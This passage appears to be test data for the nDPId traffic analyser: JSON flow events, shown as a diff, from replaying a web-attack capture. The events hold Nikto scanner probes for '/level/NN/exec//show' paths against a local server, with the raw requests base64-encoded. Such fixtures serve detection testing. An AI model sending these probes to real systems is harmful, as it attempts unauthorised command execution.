(Nikto\/2.1.6) (Evasions:None) (Test:001298)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277644,"pkt":"AAAAAAAAAAAAAAAACABFAADIp2FAAEAGlMx\/AAABfwAAAcZKH5BZVp5d6Tz88YAYAED+vAAAAQEICp1m\/rSdZv60R0VUIC9sZXZlbC81Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277646,"pkt":"AAAAAAAAAAAAAAAACABFAADIRMlAAEAG92R\/AAABfwAAAcZMH5Ck2n3FkPG1\/IAYAED+vAAAAQEICp1m\/radZv62R0VUIC9sZXZlbC81My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277648,"pkt":"AAAAAAAAAAAAAAAACABFAADIfG5AAEAGv79\/AAABfwAAAcZOH5Bk90VplsnARIAYAED+vAAAAQEICp1m\/ridZv64R0VUIC9sZXZlbC81NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/54\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001301)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277650,"pkt":"AAAAAAAAAAAAAAAACABFAADIGk5AAEAGIeB\/AAABfwAAAcZQH5A3JSNJK84\/noAYAED+vAAAAQEICp1m\/rmdZv65R0VUIC9sZXZlbC81NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":603,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277650,"flow_last_seen":1576420277650,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277650,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50768,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/55\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001302)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277657,"pkt":"AAAAAAAAAAAAAAAACABFAADIqGlAAEAGk8R\/AAABfwAAAcZSH5BRNZFiv2NJXIAYAED+vAAAAQEICp1m\/sGdZv7AR0VUIC9sZXZlbC81Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277657,"flow_last_seen":1576420277657,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277657,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50770,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/56\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001303)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_packet_id":1,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277658,"pkt":"AAAAAAAAAAAAAAAACABFAADIKidAAEAGEgd\/AAABfwAAAcZUH5DRhBMk1ziDVIAYAED+vAAAAQEICp1m\/sKdZv7CR0VUIC9sZXZlbC81Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDQpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":605,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":605,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277658,"flow_last_seen":1576420277658,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277658,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50772,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/57\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001304)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_packet_id":1,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277660,"pkt":"AAAAAAAAAAAAAAAACABFAADI7vpAAEAGTTN\/AAABfwAAAcZWH5Ba4NgASBBLBYAYAED+vAAAAQEICp1m\/sSdZv7ER0VUIC9sZXZlbC81OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277660,"flow_last_seen":1576420277660,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50774,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/58\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001305)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
